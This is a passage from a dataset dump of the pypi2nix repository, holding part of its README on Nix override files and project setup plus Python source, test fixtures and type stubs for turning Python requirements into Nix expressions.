'BERKELEYDB_DIR=${pkgs.db.dev}'\n\n\nUsing requirements_override.nix\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nSome other failures might be caused because the derivation that\n``pypi2nix`` wrote was incomplete. A very common situation is that\n``pypi2nix`` didn't include all the dependencies of some package. As\nan example, ``execnet`` depends on ``setuptools-scm``, but\n``pypi2nix`` may not detect this.\n\nWhen this happens, Nix will fail to build ``execnet``, perhaps with an\nerror message from distutils/setuptools complaining that it can't find\na distribution for ``setuptools-scm``. What's happening here is that\nnormally ``execnet`` would fetch ``setuptools-scm`` from PyPI, but Nix\ndisables network access to guarantee reproducability. So when you\nbuild ``execnet``, it fails to find ``setuptools-scm``.\n\nFor these situations, ``pypi2nix`` provides a\n``requirements_override.nix`` file, which lets you override anything\nthat it generated. You can even add new packages to the dependency set\nthis way.\n\nAs an example, let's add ``setuptools-scm`` as a build-time dependency\nof ``execnet``. Here's the ``requirements_override.nix``::\n\n { pkgs, python }:\n\n self: super: {\n\n \"execnet\" = python.overrideDerivation super.\"execnet\" (old: {\n buildInputs = old.buildInputs ++ [ self.\"setuptools-scm\" ];\n });\n\n }\n\n\nIn a similar way, you can add or remove any Python package.\n\nShared overrides\n^^^^^^^^^^^^^^^^\n\nIn addition to the empty autogenerated ``requirements_overrides.nix``\nfile, you can include pre-existing overrides files. These overrides\nwill be included the same way as your ``requirements_overrides.nix``.\n\nThe ``pypi2nix`` author also maintains a set of \"default\" overrides at\nhttps://github.com/nix-community/pypi2nix-overrides/blob/master/overrides.nix --\nyou can include these by using the ``--default-overrides`` argument to\n``pypi2nix``. These overrides are designed in such a way that they\nonly override dependencies that were already present in your\n``requirements.nix``.\n\nYou can also include an overrides file using the ``-O`` command line\nargument. ``pypi2nix`` can fetch these overrides from a local file or\nover certain common protocols.\n\n``http`` and ``https``\n ``pypi2nix --overrides https://raw.githubusercontent.com/nix-community/pypi2nix-overrides/master/overrides.nix``\n\n Note that the generated Nix expression will check if contents of\n the overrides file differs from when the Nix expression was built, and\n fail if this was the case (or the file does not exist anymore).\n\nLocal files\n ``pypi2nix --override ../some/relative/path --override /some/absolute/path``\n\nGit repositories\n ``pypi2nix --override git+https://github.com/nix-community/pypi2nix.git#path=overrides.nix``\n\n If you want to import a file from a specific git repository you have\n to prefix its URL with ``git+``, quite similar to how you would do\n in a ``requirements.txt`` file for ``pip``.\n\n4. Advanced Use\n---------------\n\nCreating default.nix for your project\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nNothing speaks better than an example::\n\n { }:\n\n let\n pkgs = import <nixpkgs> {};\n python = import ./requirements.nix { inherit pkgs; };\n in python.mkDerivation {\n name = \"projectA-1.0.0\";\n src = ./.;\n buildInputs = [\n python.packages.\"coverage\"\n python.packages.\"flake8\"\n python.packages.\"mock\"\n python.packages.\"pytest\"\n python.packages.\"pytest-asyncio\"\n python.packages.\"pytest-cov\"\n python.packages.\"pytest-mock\"\n python.packages.\"pytest-xdist\"\n ];\n propagatedBuildInputs = [\n python.packages.\"aiohttp\"\n python.packages.\"arrow\"\n python.packages.\"defusedxml\"\n python.packages.\"frozendict\"\n python.packages.\"jsonschema\"\n ];\n checkPhase = ''\n export NO_TESTS_OVER_WIRE=1\n export PYTHONDONTWRITEBYTECODE=1\n\n flake8 src/\n py.test --cov=src -cov-report term-missing\n coverage html\n '';\n }\n\n\nImportant to know here is that you instantiate all generated packages\nas ``python = import ./requirements.nix { inherit pkgs; };`` which\ngives you a Python environment with all the packages generated by\n``pypi2nix`` as well as some common utilities.\n\nTo create a package you use ``python.mkDerivation`` which works like\nthe ``pythonPackages.buildPythonPackage`` function in ``nixpkgs``. All\ngenerated packages are available as one attribute set under\n``python.packages``.\n\n.. TODO explain withPackages and show some example\n\nOne of future goals of ``pypi2nix`` project is to also improve the UX of our\nPython tooling in nixpkgs. While this is very hard to do within ``nixpkgs`` it\nis almost trivial to experiment with this outside ``nixpkgs``.\n\n\nConvert generated requirements.nix into nixpkgs overlay\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nA working example is worth 1000 words.\n\noverlay.nix::\n\n self: super:\n {\n customPython =\n (import ./requirements.nix { pkgs = self; });\n }\n\nshell.nix::\n\n with (import <nixpkgs> { overlays = [ (import ./overlay.nix) ]; });\n customPython.interpreter\n\n\n.. _`Nix expressions`: http://nixos.org/nix/manual/#chap-writing-nix-expressions\n.. _`examples/Makefile`: https://github.com/nix-community/pypi2nix/blob/master/examples/Makefile\n.. _`nix-env`: http://nixos.org/nix/manual/#sec-nix-env\n.. _`home-manager`: https://github.com/rycee/home-manager\n" }, { "alpha_fraction": 0.5053078532218933, "alphanum_fraction": 0.5180467367172241, "avg_line_length": 17.115385055541992, "blob_id": "8a343cbc3c3a3ec792e8acdcb825ad5e8fe64506", "content_id": "1de067bd6a708c7763eee3c0bc859b3da7f13450", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "permissive", "max_line_length": 50, "num_lines": 26, "path": "/unittests/test_memoize.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.memoize import memoize\n\n\ndef test_memoized_method_returns_correct_result():\n class A:\n @memoize\n def x(self):\n return 1\n\n assert A().x() == 1\n\n\ndef test_memoized_method_gets_called_only_once():\n class A:\n def __init__(self):\n self.times_called = 0\n\n @memoize\n def x(self):\n self.times_called += 1\n return\n\n a = A()\n a.x()\n a.x()\n assert a.times_called == 1\n" }, { "alpha_fraction": 0.7237762212753296, "alphanum_fraction": 0.7237762212753296, "avg_line_length": 30.77777862548828, "blob_id": "1c1dbceb34a075bb42e02dc44002043cf742f9dd", "content_id": "93fb6ce295f138d3f43f085654fd578ee715aeec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 286, "license_type": "no_license", "max_line_length": 54, "num_lines": 9, "path": "/integrationtests/test_relative_paths.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass RelativePathsTestCase(IntegrationTest):\n name_of_testcase = \"relative_paths\"\n requirements = [\"test_package/.#egg=test_package\"]\n\n def requirements_file_check(self, content):\n self.assertIn(\"src = test_package/.\", content)\n" }, { "alpha_fraction": 0.4964176118373871, "alphanum_fraction": 0.4984646737575531, "avg_line_length": 19.35416603088379, "blob_id": "2e14df28374790694479c635bc8f01c39d119a6b", "content_id": "403d72852cb8c9e48cd74dd94eafb2ee080231a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 977, "license_type": "no_license", "max_line_length": 65, "num_lines": 48, "path": "/scripts/update_dependencies.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport argparse\nimport subprocess\n\nfrom repository import ROOT\n\n\ndef main():\n arguments = parse_arguments()\n subprocess.run(\n [\n \"pypi2nix\",\n \"-r\",\n \"requirements.txt\",\n \"-r\",\n \"requirements-dev.txt\",\n \"-s\",\n \"pytest-runner\",\n \"-s\",\n \"setupmeta\",\n \"--no-default-overrides\",\n \"-E\",\n \"openssl libffi\",\n ]\n + ([\"-v\"] if arguments.verbose else []),\n cwd=ROOT,\n check=True,\n )\n\n\ndef parse_arguments():\n argument_parser = argparse.ArgumentParser(\n description=\"Update development dependencies of pypi2nix\"\n )\n argument_parser.add_argument(\n \"--verbose\",\n \"-v\",\n help=\"Print debugging output\",\n default=False,\n action=\"store_true\",\n )\n args = argument_parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5133278369903564, "alphanum_fraction": 0.5196482539176941, "avg_line_length": 28.34677505493164, "blob_id": "8413106e49e20a1335506db1be236a86727da90d", "content_id": "2af91289bdcf7bfebe7a26e16dcb2113d1196ff8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3639, "license_type": "no_license", "max_line_length": 86, "num_lines": 124, "path": "/src/pypi2nix/package_source.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nfrom typing import Dict\nfrom typing import Optional\nfrom typing import Union\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.utils import prefetch_git\nfrom pypi2nix.utils import prefetch_hg\nfrom pypi2nix.utils import prefetch_url\n\nPackageSource = Union[\"GitSource\", \"HgSource\", \"PathSource\", \"UrlSource\"]\n\n\nclass GitSource:\n def __init__(self, url: str, revision: Optional[str] = None):\n self.url = url\n self._prefetch_data: Optional[Dict[str, str]] = None\n self._revision = revision\n\n def nix_expression(self) -> str:\n return \"\\n\".join(\n [\n \"pkgs.fetchgit {\",\n ' url = \"%(url)s\";',\n ' %(hash_type)s = \"%(hash_value)s\";',\n ' rev = \"%(rev)s\";',\n \" }\",\n ]\n ) % dict(\n url=self.url,\n hash_type=\"sha256\",\n hash_value=self.hash_value(),\n rev=self.revision(),\n )\n\n def hash_value(self) -> str:\n return self.prefetch_data()[\"sha256\"]\n\n def revision(self) -> str:\n return self.prefetch_data()[\"rev\"]\n\n def prefetch_data(self) -> Dict[str, str]:\n if self._prefetch_data is None:\n self._prefetch_data = prefetch_git(self.url, self._revision)\n return self._prefetch_data\n\n\nclass HgSource:\n def __init__(\n self, url: str, logger: Logger, revision: Optional[str] = None\n ) -> None:\n self.url = url\n self._revision = revision\n self._prefetch_data: Optional[Dict[str, str]] = None\n self.logger = logger\n\n def nix_expression(self) -> str:\n return \"\\n\".join(\n [\n \"pkgs.fetchhg {{\",\n ' url = \"{url}\";',\n ' sha256 = \"{hash_value}\";',\n ' rev = \"{revision}\";',\n \" }}\",\n ]\n ).format(url=self.url, hash_value=self.hash_value(), revision=self.revision())\n\n def hash_value(self) -> str:\n return self.prefetch_data()[\"sha256\"]\n\n def revision(self) -> str:\n return self.prefetch_data()[\"revision\"]\n\n def prefetch_data(self) -> Dict[str, str]:\n if self._prefetch_data is None:\n self._prefetch_data = prefetch_hg(self.url, self.logger, self._revision)\n return self._prefetch_data\n\n\nclass UrlSource:\n def __init__(\n self, url: str, logger: Logger, hash_value: Optional[str] = None\n ) -> None:\n self.url = url\n self._hash_value = hash_value\n self.chunk_size = 2048\n self.logger = logger\n\n def nix_expression(self) -> str:\n return \"\\n\".join(\n [\n \"pkgs.fetchurl {{\",\n ' url = \"{url}\";',\n ' sha256 = \"{hash_value}\";',\n \"}}\",\n ]\n ).format(url=self.url, hash_value=self.hash_value())\n\n def hash_value(self) -> str:\n if self._hash_value is None:\n self._hash_value = self.calculate_hash_value()\n return self._hash_value\n\n def calculate_hash_value(self) -> str:\n return prefetch_url(self.url, self.logger)\n\n\nclass PathSource:\n def __init__(self, path: str) -> None:\n self.path = path\n\n @property\n def _normalized_path(self) -> str:\n if os.path.isabs(self.path):\n return self.path\n else:\n head, tail = os.path.split(self.path)\n if head:\n return self.path\n else:\n return os.path.join(self.path, \".\")\n\n def nix_expression(self) -> str:\n return self._normalized_path\n" }, { "alpha_fraction": 0.576795220375061, "alphanum_fraction": 0.5797872543334961, "avg_line_length": 34.38823699951172, "blob_id": "bd1c7c69147173a4b3b3baf30887e5ef3952c0bc", "content_id": "cdd34dc3c3fd27cb3281d6b3fa6f81a144c30d0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6016, "license_type": "no_license", "max_line_length": 88, "num_lines": 170, "path": "/src/pypi2nix/pip/virtualenv.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom contextlib import contextmanager\nfrom tempfile import TemporaryDirectory\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom venv import EnvBuilder\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.pip import PipFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.utils import cmd\n\n\nclass VirtualenvPip(Pip):\n def __init__(\n self,\n logger: Logger,\n target_platform: TargetPlatform,\n target_directory: str,\n env_builder: EnvBuilder,\n requirement_parser: RequirementParser,\n no_index: bool = False,\n wheel_distribution_path: Optional[str] = None,\n find_links: List[str] = [],\n ) -> None:\n self.logger = logger\n self.target_platform = target_platform\n self.target_directory = target_directory\n self.env_builder = env_builder\n self.no_index = no_index\n self.wheel_distribution_path = wheel_distribution_path\n self.find_links = find_links\n self.requirement_parser = requirement_parser\n\n def prepare_virtualenv(self) -> None:\n self.env_builder.create(self.target_directory)\n self._execute_pip_command(\n [\"install\", self._wheel_requirement_name()] + self._maybe_index()\n )\n\n def download_sources(\n self, requirements: RequirementSet, target_directory: Path\n ) -> None:\n with self._requirements_file(requirements) as requirement_file:\n self._execute_pip_command(\n [\n \"download\",\n \"-r\",\n requirement_file,\n \"--dest\",\n str(target_directory),\n \"--no-binary\",\n \":all:\",\n ]\n + self._maybe_index()\n )\n\n def build_wheels(\n self,\n requirements: RequirementSet,\n target_directory: Path,\n source_directories: List[Path],\n ) -> None:\n with self._requirements_file(requirements) as requirement_file:\n source_dir_arguments: List[str] = []\n for source_directory in source_directories:\n source_dir_arguments.append(\"--find-links\")\n source_dir_arguments.append(str(source_directory))\n self._execute_pip_command(\n [\"wheel\", \"--wheel-dir\", str(target_directory), \"--no-index\"]\n + source_dir_arguments\n + [\"--requirement\", requirement_file]\n )\n\n def install(\n self,\n requirements: RequirementSet,\n source_directories: List[Path],\n target_directory: Path,\n ) -> None:\n with self._requirements_file(requirements) as requirements_file:\n source_directories_arguments = []\n for source_directory in source_directories:\n source_directories_arguments.append(\"--find-links\")\n source_directories_arguments.append(str(source_directory))\n self._execute_pip_command(\n [\n \"install\",\n \"--no-index\",\n \"--target\",\n str(target_directory),\n \"-r\",\n requirements_file,\n ]\n + source_directories_arguments\n )\n\n def freeze(self, python_path: List[Path]) -> str:\n return self._execute_pip_command([\"freeze\"], pythonpath=python_path)\n\n def _pip_path(self) -> str:\n return os.path.join(self.target_directory, \"bin\", \"pip\")\n\n def _execute_pip_command(\n self, arguments: List[str], pythonpath: List[Path] = []\n ) -> str:\n with self._explicit_pythonpath(pythonpath), self._set_environment_variable(\n {\"SOURCE_DATE_EPOCH\": \"315532800\",}\n ):\n returncode, output = cmd([self._pip_path()] + arguments, logger=self.logger)\n if returncode != 0:\n raise PipFailed(output=output)\n return output\n\n @contextmanager\n def _explicit_pythonpath(self, pythonpath: List[Path]) -> Iterator[None]:\n additional_paths = \":\".join(map(str, pythonpath))\n with self._set_environment_variable({\"PYTHONPATH\": additional_paths}):\n yield\n\n @contextmanager\n def _requirements_file(self, requirements: RequirementSet) -> Iterator[str]:\n with TemporaryDirectory() as directory:\n yield requirements.to_file(\n directory, self.target_platform, self.requirement_parser, self.logger\n ).processed_requirements_file_path()\n\n @contextmanager\n def _set_environment_variable(\n self, variables: Dict[str, Optional[str]]\n ) -> Iterator[None]:\n def set_environment(environment: Dict[str, Optional[str]]) -> None:\n for name, value in variables.items():\n if value is None:\n del os.environ[name]\n else:\n os.environ[name] = value\n\n old_environment = dict(os.environ)\n set_environment(variables)\n try:\n yield\n finally:\n for key, value in old_environment.items():\n os.environ[key] = value\n for key in os.environ.keys():\n if key not in old_environment:\n del os.environ[key]\n\n def _maybe_index(self) -> List[str]:\n arguments: List[str] = []\n if self.no_index:\n arguments.append(\"--no-index\")\n for link in self.find_links:\n arguments.append(\"--find-links\")\n arguments.append(link)\n return arguments\n\n def _wheel_requirement_name(self) -> str:\n if self.wheel_distribution_path is None:\n return \"wheel\"\n else:\n return self.wheel_distribution_path\n" }, { "alpha_fraction": 0.7573529481887817, "alphanum_fraction": 0.7573529481887817, "avg_line_length": 23.727272033691406, "blob_id": "7ac5e63888380a32eb5b018ce621eeea5290d70c", "content_id": "76b5c54f2bee93a7a375481e519da823b8500e13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 272, "license_type": "no_license", "max_line_length": 38, "num_lines": 11, "path": "/integrationtests/test_pynacl.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from unittest import expectedFailure\n\nfrom .framework import IntegrationTest\n\n\n@expectedFailure\nclass PynaclTestCase(IntegrationTest):\n name_of_testcase = \"pynacl\"\n requirements = [\"pynacl\"]\n external_dependencies = [\"libffi\"]\n explicit_build_directory = True\n" }, { "alpha_fraction": 0.6290202140808105, "alphanum_fraction": 0.6290202140808105, "avg_line_length": 28.065217971801758, "blob_id": "2aa13d005c7e9299939044a51084a31013628471", "content_id": "e9e2b60a48528dc18c4848d86c86316d4879f681", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1337, "license_type": "no_license", "max_line_length": 85, "num_lines": 46, "path": "/src/pypi2nix/package/metadata.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nfrom email.header import Header\nfrom email.parser import Parser as EmailParser\n\nfrom attr import attrib\nfrom attr import attrs\n\nfrom .exceptions import DistributionNotDetected\n\n\n@attrs\nclass PackageMetadata:\n name: str = attrib()\n\n @classmethod\n def from_package_directory(package_metadata, path: str) -> \"PackageMetadata\":\n builder = _PackageMetadataBuilder(path)\n return package_metadata(name=builder.name)\n\n\nclass _PackageMetadataBuilder:\n def __init__(self, path_to_directory: str) -> None:\n self.path_to_directory = path_to_directory\n self._name: str = \"\"\n\n self.build()\n\n @property\n def name(self) -> str:\n return self._name\n\n def build(self) -> None:\n pkg_info_file = os.path.join(self.path_to_directory, \"PKG-INFO\")\n try:\n with open(pkg_info_file) as f:\n parser = EmailParser()\n metadata = parser.parse(f)\n except FileNotFoundError:\n raise DistributionNotDetected(\n f\"Could not find PKG-INFO file in {self.path_to_directory}\"\n )\n self._name = metadata.get(\"name\")\n if isinstance(self._name, Header):\n raise DistributionNotDetected(\n \"Could not parse source distribution metadata, name detection failed\"\n )\n" }, { "alpha_fraction": 0.7008432149887085, "alphanum_fraction": 0.7096419334411621, "avg_line_length": 27.41319465637207, "blob_id": "a770c04f81d757c597848260a7c2ecf1f0ad8a3d", "content_id": "9d789b0c5c63a55c6a07e94bdeda434fa6fbe574", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8183, "license_type": "no_license", "max_line_length": 88, "num_lines": 288, "path": "/conftest.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport pathlib\nimport venv\nfrom io import StringIO\nfrom typing import Any\nfrom typing import Generator\n\nimport pytest\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.pip import VirtualenvPip\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import PlatformGenerator\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.wheel import Wheel\nfrom pypi2nix.wheel_builder import WheelBuilder\nfrom unittests.package_generator import PackageGenerator\n\n\nclass MyInt(int):\n def tolles_feature(self):\n print(\"yo\")\n\n\nDATA_DIRECTORY = os.path.join(os.path.dirname(__file__), \"unittests\", \"data\")\n\n\n@pytest.fixture\ndef nix(logger: Logger) -> Nix:\n return Nix(logger)\n\n\n@pytest.fixture\ndef project_dir(tmpdir_factory: Any) -> str:\n path: pathlib.Path = tmpdir_factory.mktemp(\"package_source_directory\")\n return str(path)\n\n\n@pytest.fixture\ndef download_dir(project_dir: str) -> Path:\n path: str = os.path.join(project_dir, \"download\")\n os.makedirs(path)\n return Path(path)\n\n\n@pytest.fixture\ndef wheels_dir(project_dir: str) -> Path:\n path = os.path.join(project_dir, \"wheels\")\n os.makedirs(path)\n return Path(path)\n\n\n@pytest.fixture\ndef wheel_builder(\n pip: Pip,\n project_dir: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n current_platform: TargetPlatform,\n base_dependency_graph: DependencyGraph,\n) -> WheelBuilder:\n base_dir = Path(project_dir)\n return WheelBuilder(\n pip=pip,\n download_directory=base_dir / \"downloads\",\n lib_directory=base_dir / \"lib\",\n wheel_directory=base_dir / \"wheels\",\n extracted_wheel_directory=base_dir / \"extracted-wheels\",\n logger=logger,\n requirement_parser=requirement_parser,\n target_platform=current_platform,\n base_dependency_graph=base_dependency_graph,\n )\n\n\n@pytest.fixture\ndef base_dependency_graph() -> DependencyGraph:\n return DependencyGraph()\n\n\n@pytest.fixture\ndef extracted_six_package(\n six_requirements: RequirementSet,\n wheel_builder: WheelBuilder,\n current_platform: TargetPlatform,\n logger: Logger,\n requirement_parser: RequirementParser,\n) -> str:\n wheels = wheel_builder.build(six_requirements)\n for wheel_directory in wheels:\n wheel = Wheel.from_wheel_directory_path(\n wheel_directory, current_platform, logger, requirement_parser\n )\n if wheel.name == \"six\":\n return wheel_directory\n raise Exception('Error when trying to build wheel for \"six == 1.12.0\"')\n\n\n@pytest.fixture\ndef six_requirements(\n current_platform: TargetPlatform, requirement_parser: RequirementParser\n) -> RequirementSet:\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six == 1.12.0\"))\n return requirements\n\n\n@pytest.fixture\ndef six_source_distribution_archive(data_directory: str) -> Archive:\n return Archive(path=os.path.join(data_directory, \"six-1.12.0.tar.gz\"))\n\n\n@pytest.fixture\ndef distribution_archive_for_jsonschema(data_directory: str) -> Archive:\n return Archive(path=os.path.join(data_directory, \"jsonschema-3.0.1.tar.gz\"))\n\n\n@pytest.fixture(params=(\"six == 1.12.0\", \"setuptools == 41.0.1\"))\ndef requirement(request: Any, requirement_parser: RequirementParser) -> Requirement:\n return requirement_parser.parse(request.param)\n\n\n@pytest.fixture\ndef setupcfg_package_wheel_path(data_directory: str) -> str:\n return os.path.join(data_directory, \"setupcfg_package-1.0-py3-none-any.whl\")\n\n\n@pytest.fixture\ndef setupcfg_package_wheel(\n setupcfg_package_wheel_path: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n current_platform: TargetPlatform,\n) -> Wheel:\n archive = Archive(path=setupcfg_package_wheel_path)\n with archive.extracted_files() as directory:\n return Wheel.from_wheel_directory_path(\n os.path.join(directory, \"setupcfg_package-1.0.dist-info\"),\n current_platform,\n logger,\n requirement_parser,\n )\n\n\n@pytest.fixture\ndef pip(\n logger: Logger,\n current_platform: TargetPlatform,\n project_dir: str,\n wheel_distribution_archive_path: str,\n data_directory: str,\n requirement_parser: RequirementParser,\n package_source_directory: Path,\n) -> VirtualenvPip:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"pip-without-index-venv\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n wheel_distribution_path=wheel_distribution_archive_path,\n find_links=[data_directory, str(package_source_directory)],\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n\n\n@pytest.fixture(params=(\"six-1.12.0.tar.gz\", \"jsonschema-3.0.1.tar.gz\"))\ndef source_distribution_archive(request: Any, data_directory: str) -> Archive:\n return Archive(path=os.path.join(data_directory, request.param))\n\n\n@pytest.fixture\ndef platform_generator(nix: Nix, logger: Logger) -> PlatformGenerator:\n return PlatformGenerator(nix, logger)\n\n\n@pytest.fixture\ndef current_platform(platform_generator: PlatformGenerator) -> TargetPlatform:\n platform = platform_generator.current_platform()\n if platform is None:\n raise Exception(\"Could not recognize current platform\")\n else:\n return platform\n\n\n@pytest.fixture\ndef test_txt_content():\n path = os.path.join(DATA_DIRECTORY, \"test.txt\")\n with open(path) as f:\n return f.read()\n\n\n@pytest.fixture\ndef test_tar_gz_path():\n return os.path.join(DATA_DIRECTORY, \"test.tar.gz\")\n\n\n@pytest.fixture\ndef test_zip_path() -> str:\n return os.path.join(DATA_DIRECTORY, \"test.zip\")\n\n\n@pytest.fixture\ndef test_tar_bz2_path() -> str:\n return os.path.join(DATA_DIRECTORY, \"test.tar.bz2\")\n\n\n@pytest.fixture\ndef data_directory() -> str:\n return DATA_DIRECTORY\n\n\n@pytest.fixture\ndef logger() -> Generator[Logger, None, None]:\n with StringIO() as f:\n yield StreamLogger(output=f)\n\n\n@pytest.fixture\ndef requirement_parser(logger):\n return RequirementParser(logger=logger)\n\n\n@pytest.fixture\ndef wheel_distribution_archive_path(data_directory):\n return os.path.join(data_directory, \"wheel-0.33.6-py2.py3-none-any.whl\")\n\n\n@pytest.fixture\ndef sources_for_test_packages(data_directory):\n sources = Sources()\n package_names = [\"setupcfg-package\", \"package1\", \"package2\", \"package3\", \"package4\"]\n for package_name in package_names:\n sources.add(\n package_name,\n PathSource(os.path.join(data_directory, f\"{package_name}-1.0.tar.gz\")),\n )\n return sources\n\n\n@pytest.fixture\ndef pypi(logger: Logger) -> Pypi:\n return Pypi(logger=logger)\n\n\n@pytest.fixture\ndef flit_wheel(data_directory, current_platform, logger, requirement_parser):\n path = os.path.join(data_directory, \"flit-1.3-py3-none-any.whl\")\n with Archive(path=path).extracted_files() as wheel_directory:\n return Wheel.from_wheel_directory_path(\n os.path.join(wheel_directory, \"flit-1.3.dist-info\"),\n current_platform,\n logger,\n requirement_parser,\n )\n\n\n@pytest.fixture\ndef package_source_directory(tmpdir_factory: Any) -> Path:\n path_as_str: str = str(tmpdir_factory.mktemp(\"package_source_directory\"))\n return Path(path_as_str)\n\n\n@pytest.fixture\ndef package_generator(\n package_source_directory: Path,\n logger: Logger,\n requirement_parser: RequirementParser,\n) -> PackageGenerator:\n return PackageGenerator(\n target_directory=pathlib.Path(str(package_source_directory)),\n requirement_parser=requirement_parser,\n logger=logger,\n )\n" }, { "alpha_fraction": 0.7439024448394775, "alphanum_fraction": 0.7439024448394775, "avg_line_length": 26.33333396911621, "blob_id": "17abe92a011e26790f3475809b5c0f271b139169", "content_id": "e4c744d158337ba0a12edac6755b14344fc1a9d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 164, "license_type": "no_license", "max_line_length": 44, "num_lines": 6, "path": "/integrationtests/test_local_path.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass LocalPathTestCase(IntegrationTest):\n name_of_testcase = \"local_path\"\n requirements = [\"-e egg#egg=local_path\"]\n" }, { "alpha_fraction": 0.6497175097465515, "alphanum_fraction": 0.6497175097465515, "avg_line_length": 28.5, "blob_id": "f234ee7b34b25ff4c0aca9b7b9066c564428984d", "content_id": "7c9506dd3be56aa128ed94d6a51f019c112ff1af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 73, "num_lines": 6, "path": "/mypy/nix_prefetch_github/__init__.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Dict\nfrom typing import Optional\n\ndef nix_prefetch_github(\n owner: str, repo: str, prefetch: bool = ..., rev: Optional[str] = ...\n) -> Dict[str, str]: ...\n" }, { "alpha_fraction": 0.7406716346740723, "alphanum_fraction": 0.7453358173370361, "avg_line_length": 31.484848022460938, "blob_id": "f40e177ba8c38d462f10ad574951e92c1b86f244", "content_id": "837afc8411d014a0d448dfe31b2e24dd3077bcef", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1072, "license_type": "permissive", "max_line_length": 80, "num_lines": 33, "path": "/unittests/pip/test_freeze.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom ..switches import nix\n\n\n@nix\ndef test_freeze_on_empty_environment_yields_empty_file(pip: Pip):\n frozen_requirements = pip.freeze([])\n assert not frozen_requirements.strip()\n\n\n@nix\ndef test_freeze_respects_additional_python_path(\n pip: Pip,\n project_dir: str,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n download_dir: Path,\n):\n prefix = Path(project_dir) / \"custom-prefix\"\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip.download_sources(requirements, download_dir)\n pip.install(\n requirements, target_directory=prefix, source_directories=[download_dir]\n )\n freeze_without_six = pip.freeze([])\n freeze_with_six = pip.freeze(python_path=[prefix])\n assert len(freeze_without_six) < len(freeze_with_six)\n" }, { "alpha_fraction": 0.5952380895614624, "alphanum_fraction": 0.5952380895614624, "avg_line_length": 15.800000190734863, "blob_id": "669a2d661efaa2f366fdfd40a21be4ba937591a7", "content_id": "a061f594e6d731cb6cf84a8d12e549c502edf2ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 50, "num_lines": 5, "path": "/mypy/setuptools/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Any\n\n\ndef setup(*args, **kwargs) -> Any: # type: ignore\n ...\n" }, { "alpha_fraction": 0.9019607901573181, "alphanum_fraction": 0.9019607901573181, "avg_line_length": 50, "blob_id": "415e722f4f1c5f46e88da9400daaf64e00a08060", "content_id": "ca11f8ac589128c3dd0d786daedc525d34abea2b", 